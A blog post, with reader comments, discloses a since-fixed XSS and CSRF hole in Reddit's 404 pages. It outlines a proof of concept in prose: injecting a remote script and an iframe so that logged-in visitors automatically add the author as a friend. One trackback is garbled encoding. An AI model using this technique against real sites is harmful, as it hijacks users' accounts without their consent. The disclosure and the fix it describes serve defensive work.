XSS Hole in Reddit Allows Gaping Access: Proof of Concept
Fixed by Reddit.
So, a few months back Digg added a new feature that allowed users to invite and add friends more easily. Unfortunately, as I reported then, this hole allowed a site to automatically add friends if the visitor was still logged into Digg.
This story did quite well in Reddit, often considered rivals, actually out performing the story on Digg which was, unsurprisingly, quickly buried.
Nevertheless, an XSS hole in the handling of non-existing 404 pages has created a gaping hole which can allow a site to perform almost any site function we would want. To be fair to Reddit, I figured the Proof of Concept should mimic the same one as I did for Digg, an auto friend adder. If you are reading this page and are logged into Reddit, assuming the hole has not yet been fixed, you will add “rjonesx” as a friend.
By using the most basic XSS and CSRF techniques, I was able to do the following…
- Inject a remote script onto a 404 page (http://www.thegooglecache.com/reddit-friends-adder.js)
- Inject an iframe into that same 404 page of the /prefs/friends page
- Use the remote script with a basic timed delay to fill out and submit the form on the /prefs/friends page to add rjonesx as a friend
The solution, of course, is as simple as any good XSS security solution. Don’t print out what is in the URL. If you must, strip all HTML.
3 Comments
Trackbacks/Pingbacks
- Web担当者Forum - 専門家ã®僕ãÂ΍Ââ€Ã£Âˆã‚‰ã‚Œãªã„8ã¤ã®SEOã®疑å•Â... [海外特é¸サイト翻訳] SEOmoz 検索マーケティングã®ニュース&テクニック 「åŒ一ページã¸ã®リンクを1ページã«複数置ã„ãŸら?ã€Â「ã„ã£ãŸん作られãŸリンクãŒ削除ã•れるã¨ã€Âã‚‚ã¨もã¨リン...
- Stumbleupon Cross-Site Scripting Vulnerability - [...] I have previously identified XSS and/or CSRF vulnerabilities in both Digg and Reddit, Stumbleupon has largely remained innocuous to…
The latest version of Firefox’s NoScript extension (since he started calling it “the XSS Punisher”) is easily preventing your demo.
Cheers!
Note: That Extension Deserves a Link! Excellent., Thanks for pointing it out Aerik
I noticed that when I marked this domain untrusted, and even after I added *googlecache* to adblock plus, Noscript 1.1.4.9… was still telling me about sanitizing your demo here. I asked NoScript’s developer to allow us to remove the URI about:neterror from the whitelist. He took my advice, and has updated to 1.1.5. I’ve removed about:neterror from the whitelist, and now finally, your demo doesn’t even get far enough to need sanitizing. It’s a damn good extension.
Oh, wait… I saw just now, after the page refreshed, that Reddit fixed the problem. My bad. XO